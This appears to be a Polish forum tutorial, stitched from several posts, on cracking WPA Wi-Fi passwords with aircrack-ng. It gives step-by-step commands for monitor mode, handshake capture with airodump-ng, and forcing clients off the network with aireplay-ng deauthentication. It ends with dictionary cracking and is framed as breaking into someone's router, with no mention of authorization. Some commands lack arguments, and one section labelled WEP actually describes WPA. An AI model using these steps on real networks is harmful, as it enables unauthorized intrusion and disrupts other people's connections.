Prosty przyklad uzyskania HANDSHAKE ale przy tym morzesz miec kilka trudnosci z uzyskaniem HANDSHAKE np. MAC address filter, odleglosc od Routera i oczywiscie czy twoja
karta morze Wstrzykiwac pakiety

w moim wypadku moja karta to WLAN0
= MAC adres routera

1. airmon-ng stop WLAN0
2. airmon-ng start WLAN0
3. iwconfig (po tej comendzie zobaczysz czy zmienil sie MODE w jakim karta operuje)
cos takiego ( WLAN0 802.11b/g Mode:Monitor Channel=10 Bit Rate=11 Mb/s )

4. airodump-ng --bssid -c 6 -w dumpfile WLAN0
ta comenda przechwyci HANDSHAKE i zapisze go do pliku dumpfile-01.cap

otwierasz now okno i

5. aireplay-ng -0 5 -a WLAN0
ta comenda wysle comende do routera o ponowne polonczenie sie z routerem
mozasz ponownic te szmom comende az uzyskasz HANDSHAKE w poprzednim oknie
w prawym gornym rogu na pierszej lini
( CH 6 [Elapsed: 1 min ] [ 2009-02-02 13:00 ] [ WPA handshake 00:11:22:33:44:55 )

puzniej potrzebujesz tylko dobry Slownik i
6. aircrack-ng -w slownik_plik dump-o1.cap
i powodzenia z lamaniek klucza

*****************************************************************************



5. aireplay-ng -0 5 -a WLAN0
ta comenda wysle comende do routera o ponowne polonczenie sie z routerem
mozasz ponownic te szmom comende az uzyskasz HANDSHAKE w poprzednim oknie
w prawym gornym rogu na pierszej lini
( CH 6 [Elapsed: 1 min ] [ 2009-02-02 13:00 ] [ WPA handshake 00:11:22:33:44:55 )


mam pytanie czysto techniczne, jakie warunki musza byc spelnione aby uzyskac handshake?
oto moje comendy:
airodump-ng mon0 -c 10 --bssid (ap mac) -w /root/wpa

no i potem probuje handshake:
aireplay-ng -0 1 -a (ap mac) -c (station mac) mon0
niestety bez skutku, widze jak skakaja pakiety ale niestety nie ma handshake'a

Probowalem to samo w pracy, na testowym sprzecie i jakims cudem handshake zadzialal ale jak to zrobilem to nie mam pojecia, mam tam jakis blad? Czy ma to znaczenie jesli w airodump-ng --channel zamieniam na -c?
z gory dzieki za inf.

-----------Aby uzyskac handshake warunek Jest taki

1. Do rautera kturego chcesz sie wlamac musi byc conajmniej 1 CLIENT podlonczone.
2. Wykopujesz klienta z sieci za pomocom
aireplay-ng -0 1 -a (AP MAC) -c (CLIEN MAC) mon0
3. CLIENT probuje sie polonczyc ponownie z siecia a ty przechwytujesz HANDSHAKE
to tyle
******************************************************************************


WEP >>>>>>>WWWWWWWW>>>>>>>>>>>>WWWWWWWWW>>>>>>>>>>>WWWWWWWWWW>>>>>>>>>>>>
KLucz wap lamie sie w nastepujacy sposob

Kod:
airodump-ng -c <#> --bssid -w


teraz musisz czekac jak sie podlaczy jakis klient do wybranego przez ciebie AP ,w ten sposob uzyskasz handshake ktory jest potrzebny w pozniejszym etapie , jesli klient jest juz podlaczony musisz go rozlaczyc bo handshake uzyskasz tylko w momecie kiedy klient sie podlacza do AP

Kod:
aireplay-ng -0 5 -a -c


po rozlaczeniu jego system polaczy go ponownie w ten sposob uzyskasz handshake(ang.uscisk dloni) iformacja ta pojawi sie w airodump-ng w pierwszym wierszu (na samej gorze) pozniej tylko wlaczasz aircrack-ng
Kod:
aircrack-ng


skutecznosc lamania wpa

jesli haslo jest w twoim slowniku 100% , jesli go nie ma 0% a wiec wszystko zalezy od jakosci slownika
>>>>>>>>>>>>>>>WWWWWWWWWW>>>>>>>>>>>>>>>WWWWWWWWWWWWWWW>>>>>>>>>>>>>WWWWWWWWWWW>>>>>>>>>>>>>WWWWWW